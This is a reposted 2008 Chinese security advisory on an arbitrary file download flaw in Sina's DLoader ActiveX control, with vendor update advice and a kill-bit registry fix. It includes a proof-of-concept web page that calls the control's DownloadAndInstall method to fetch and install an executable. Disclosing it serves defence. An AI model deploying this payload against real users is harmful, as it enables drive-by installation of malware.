黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 正文
·新浪DLoader Class Acti07-19·百度跨站漏洞谢幕篇07-19
·百度多处XSS跨站漏洞续篇07-19·百度竞价排名多处XSS漏洞07-19
·资源零占用 让桌面图标永07-19·制作带有SATA驱动的XP安07-19
·教你个人文档资料快速大07-19·Windwos 服务器备份策略07-19
·96先锋互联提供50M/ftp商07-19·实实在在站长基地提供1007-18
·如何安全保护路由器 防止07-17·不安装摄像头 照样QQ/MS07-17
·解决QQ收不到图片问题的07-17·遇到删不掉的文件怎样处07-17
·自己动手 打造安全个人系07-17·中华最网提供50M/ftp全能07-17
·九种破解windows XP登录07-16·百度空间多处XSS漏洞续篇07-16
·百度空间多处DOM XSS漏洞07-16·久天网络免费提供200M全07-16
·Vista下玩转光盘刻录:N07-15·著名黑客工具CC攻击的思07-14
·The Week of Baidu Bugs07-14·The Week of Baidu Bugs07-14
·The Week of Baidu Bugs07-14·百度的JS数据流注入型跨07-14
·百度贴吧标题XSS漏洞07-14·硬盘分区成RAW格式无法访07-14
[推荐]新浪DLoader Class ActiveX控件任意文件下载漏洞
        ★★★★★

新浪DLoader Class ActiveX控件任意文件下载漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-7-19 10:59:54

最后更新日期:2008-7-18 15:57(GMT)

受影响系统:
Sina UC
新浪网络电视
详细:
知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.

测试方法:

以下代码可能包含恶意行为,请勿轻易尝试,使用者风险自负.

以下是引用片段:
<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1=”http://127.0.0.1/xxx.exe”;
install[”DownloadAndInstall”](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>

推荐的应对方法:

目前厂商已经发布新浪网络电视修复版本并且进行强制升级.请用户及时更新软件.

UC的用户请继续关注http://www.51uc.com/进行更新.

也可以为clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A设置kill bit.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}]
“Compatibility Flags”=dword:00000400

安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886